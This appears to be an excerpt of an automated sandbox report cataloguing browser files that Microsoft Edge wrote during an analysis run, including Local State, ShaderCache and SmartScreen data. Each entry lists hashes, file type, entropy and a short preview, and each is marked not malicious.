                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3d264.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6820
                                                                                                                                                            Entropy (8bit):5.791630604454772
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                            MD5:D2C04F360BBEE0CCAB877650F77D6A0D
                                                                                                                                                            SHA1:511678F6BF42EC8A7B47D8755D7DBCA93E976941
                                                                                                                                                            SHA-256:505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
                                                                                                                                                            SHA-512:1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):20480
                                                                                                                                                            Entropy (8bit):0.6773696719930975
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                            MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                            SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                            SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                            SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNlg/CsK:Ls3g6
                                                                                                                                                            MD5:FC183ACFCDA064109DBADE5B3FF4B4FD
                                                                                                                                                            SHA1:9D2188CCFD348913AB0CE9D688DFB500C7E8371D
                                                                                                                                                            SHA-256:07848491A7B891A6B9200CBDF1785D83EEE73819BD1BA85A893CD761D7467C78
                                                                                                                                                            SHA-512:8B647AB1F59D9C1F6FF7239747190BC89593709FF3B796A38AD2F70A3CDFB7978266474F85498F65697332E0DC3938B003D4B70A70D8A93892B7E686C6AE20CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..........................................,.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):47
                                                                                                                                                            Entropy (8bit):4.3818353308528755
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                            MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                            SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                            SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                            SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):35
                                                                                                                                                            Entropy (8bit):4.014438730983427
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                            MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                            SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                            SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                            SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"forceServiceDetermination":false}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):29
                                                                                                                                                            Entropy (8bit):3.922828737239167
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                            MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                            SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                            SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                            SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:customSynchronousLookupUris_0

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):35302
                                                                                                                                                            Entropy (8bit):7.99333285466604
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                            MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                            SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                            SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                            SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):81
                                                                                                                                                            Entropy (8bit):4.3439888556902035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                            MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                            SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                            SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                            SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-0

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3581
                                                                                                                                                            Entropy (8bit):4.459693941095613
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                            MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                            SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                            SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                            SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):130439
                                                                                                                                                            Entropy (8bit):3.80180718117079
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                            MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                            SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                            SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                            SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40
                                                                                                                                                            Entropy (8bit):4.346439344671015
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                            MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                            SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                            SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                            SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):35302
                                                                                                                                                            Entropy (8bit):7.99333285466604
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                            MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                            SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                            SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                            SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):57
                                                                                                                                                            Entropy (8bit):4.556488479039065
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                            MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                            SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                            SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                            SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):29
                                                                                                                                                            Entropy (8bit):4.030394788231021
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                            MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                            SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                            SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                            SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:topTraffic_638004170464094982

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):575056
                                                                                                                                                            Entropy (8bit):7.999649474060713
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                            MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                            SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                            SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                            SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                            Malicious:false
